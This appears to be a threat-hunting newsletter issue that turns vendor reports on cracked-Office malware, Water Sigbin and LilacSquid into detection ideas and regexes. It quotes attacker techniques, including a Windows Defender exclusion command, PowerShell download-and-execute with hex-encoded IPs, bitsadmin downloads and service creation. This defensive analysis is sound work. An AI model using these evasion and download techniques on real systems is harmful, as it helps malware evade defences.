Threat Hunter's Digest - 2024-06-03

Tareq AlKhatib

Jun 03, 2024

Greetings,

⏩BLUF

We make the following Threat Hunting / Detection suggestions based on the following:

TrendMicro’s post on Water Sigbin: 3 rules
Ahnlab’s post on Cryptojacking on Windows: 5 rules
Cisco Talos’s post on LilacSquid: 3 rules

Next update on Thursday, June 6th.

📰The Headlines

[AhnLab] Distribution of Malware Under the Guise of MS Office Cracked Versions (XMRig, OrcusRAT, etc.)

Source: https://asec.ahnlab.com/en/66017/

My favourite Korean security team is back with an analysis of malware masquerading as MS Office Cracked versions. While the post contains some IOCs, these are less likely to match anything in your network if you're not in South Korea. That said, some threat-hunting ideas based on techniques that can be useful wherever you are on the glob:

Figure 7 in the report shows a wealth of information:
1. Notice how the attackers exclude their executable from scanning by Windows Defender. This is done using the command:
  Add-MpPreference -ExclusionProcess '<executable_name>'
  You can detect this using the Sigma rule here.
2. The attackers then create a copy of powershell.exe with the executable name they excluded from scanning. You can detect renamed powershell.exe and others using the Sigma rule here.
3. With a copy of powershell.exe excluded from scanning, the attackers download and execute their malware. You can detect this using the rule here. Notice that the rule does not explicitly mention the executable name (powershell.exe) so it will detect this attack despite the renamed executable name.
4. Finally, the attackers download extra tooling using bitsadmin, but they do so using the PowerShell API instead of the bitsadmin.exe executable. You can detect this and other download methods using the Sigma rule here.
XMRig detection using domain lookups here. Please note that the miner pool used in the attack (minecraftrpgserver[.]com) is not in the list used in the rule.

[TrendMicro] Decoding Water Sigbin's Latest Obfuscation Tricks

Source: https://www.trendmicro.com/en_us/research/24/e/decoding-8220-latest-obfuscation-tricks.html

TrendMicro wrote a report on the Water Sigbin threat actor group that contains a couple of interesting behaviours:

The attackers used an interesting technique to download malware using PowerShell. While they still used the usual IEX … DownloadString() combo, the interesting bit is that they used an IP address in hexadecimal notation instead of the usual dotted decimal notation. Searching for four byte hexadecimal numbers in the command line would be an interesting threat hunt. If you don’t happen to speak regex, you can use this one: 0x[\da-fA-F]{8}
The script in figure 4 is interesting because, in effect, it is detecting the same technique in this Sigma rule but using a different syntax (that is, the Sigma rule won’t detect this script). That said, doing a threat hunt on -windowstyle hidden (or any of the variations in the Sigma rule) would be interesting, if a bit on the noisy side. You can always filter things down by correlatinng this with FromBase64String.
Finally, the obfuscation technique in Figure 7 is a very interesting one. Anyone who’s been in the detection field for long enough knows that it is easy for a human to recognize random strings but it is not as easy to put this in a rule. Without seeing more samples, my recommendations is to look for set commands where the value being set contains known commands. These known commands from the article include the following: start, exit, rem, not, and defined. Some of these strings are shorter, so you might want to play around with the regexes so you don’t end up with partial matches. If your SIEM solution supports it, may I recommend familiarizing yourself with the \b regex flag (see the questions section below).

[Talos] LilacSquid: The stealthy trilogy of PurpleInk, InkBox and InkLoader

Source: https://blog.talosintelligence.com/lilacsquid/

Talos reported on a Threat Actor group that they dubbed LilacSquid, along with very squid-inspire named for the tools the group uses. Here are a few things you can use for Threat Hunting:

Bitsadmin remains popular as a download tool for attackers. While the post does not mention the parent process for the bitsadmin.exe process, we assume it is either cmd.exe or powershell.exe, which can be an interesting Threat Hunt, depending on what’s on your network. Of course, you can always check what are the common parent processes for bitsadmin.exe and make exclusions for a wider-reaching hunt.
The service creation code (sc create …) does not contain the path where the malware was installed, which would have been an interesting threat hunt if the malware was installed in an odd directory. You can possibly hunt for services with the name TransactExDetect or some substring of such like Detect, but your results would be very specific to this particular threat actor.
Detection of MeshAgent can be done using the Sigma rule here.

🤔There Are No Stupid Questions

What does \b do in regex?
The b in \b stands for border. Effectively, it matches the start or end of a word. The word can be terminated by a space but it can also be in “quotes”, in (brackets), or just the end of the line

Doing something like \bsome_word\b would match some_word but not this_is_some_word because there is no border there.
What is a Sigbin (from the TrendMicro blog post)?
I had to look this up, but according to Wikipedia:
The Sigbin or Sigben is a creature in Philippine mythology said to come out at night to suck the blood of victims from their shadows. It is said to walk backwards with its head lowered between its hind legs, and to have the ability to become invisible (have a stealth ability) to other creatures, especially humans.
This is what AI generated for Sigbin, if you’re curious:
I think I’ll pass on this goat yoga thing

If you have a question not covered in this section, click the button below and submit your question.

Threat Hunter's Digest